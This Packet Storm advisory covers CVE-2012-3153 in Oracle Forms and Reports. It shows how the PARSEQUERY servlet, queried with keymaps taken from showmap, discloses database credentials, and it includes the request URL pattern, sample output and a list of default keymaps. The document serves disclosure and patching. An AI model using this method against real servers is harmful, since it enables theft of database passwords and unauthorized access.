Oracle Forms And Reports Database Disclosure

2014-01-28T00:00:00
ID PACKETSTORM:124974
Type packetstorm
Reporter Dana Taylor
Modified 2014-01-28T00:00:00

Description

                                        
                                            `PARSEQUERY  
  
http://docs.oracle.com/cd/E16764_01/bi.1111/b32121/pbr_cla007.htm#i640592  
  
Description  
  
Use PARSEQUERY to parse an rwservlet query and display the constructed Reports Server command line.  
  
Syntax  
  
http://your_webserver/reports/rwservlet/parsequery[?][server=server_name][&authid=username/password]  
  
CVE-2012-3153  
  
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3153  
  
Oracle Reports Developer – Version 9.0.2.0 to 10.1.2.3 [Release 9i to 10gr2]  
  
Information in this document applies to any platform.  
9iAS, 9iDS, 10G (DS and AS), and 10G AS Reports/Forms Standalone Installation  
  
An undocumented function of the PARSEQUERY function allows you to take keymaps that are located in /reports/rwservlet/showmap and add them to the query which will allow you to dump the database passwords.  
  
http://server:port/reports/rwservlet/parsequery?<keymap>  
  
Results  
  
•Original Query String(GET) :  
  
<keymap>  
  
•Result Reports Server Command Line  
  
expiredays=0 report=”<keymap>.rdf” jobname=”<keymap>.rdf” desformat=HTML authid=RWUser/ destype=cache userid=account/password@database  
  
An exploit could be written to first check the showmap file and parse the non default keymaps then run queries to grab credentials that could then be used to access various applications and/or databases.  
  
Default keymap values that do not return passwords  
  
barcodepaper  
barcodeweb  
breakbparam  
charthyperlink_ias  
charthyperlink_ids  
distributionpaper  
express  
orqa  
parmformjsp  
pdfenhancements  
report_defaultid  
report_secure  
run  
runp  
tutorial  
xmldata  
Any other keymap on an unpatched server should return usernames/passwords including the name of the database.  
  
From Oracle  
  
1) Please include references to the MOS notes that provide workarounds  
  
for 10g in your publication. These are:  
  
CVE-2012-3153: https://support.oracle.com/rs?type=doc&id=279683.1 and  
  
https://support.oracle.com/rs?type=doc&id=260243.1  
  
2) Please recommend to customers still using 10g that they upgrade to  
  
11g.  
  
3) Also, please note in your publication that 10g is currently not  
  
supported.  
  
  
`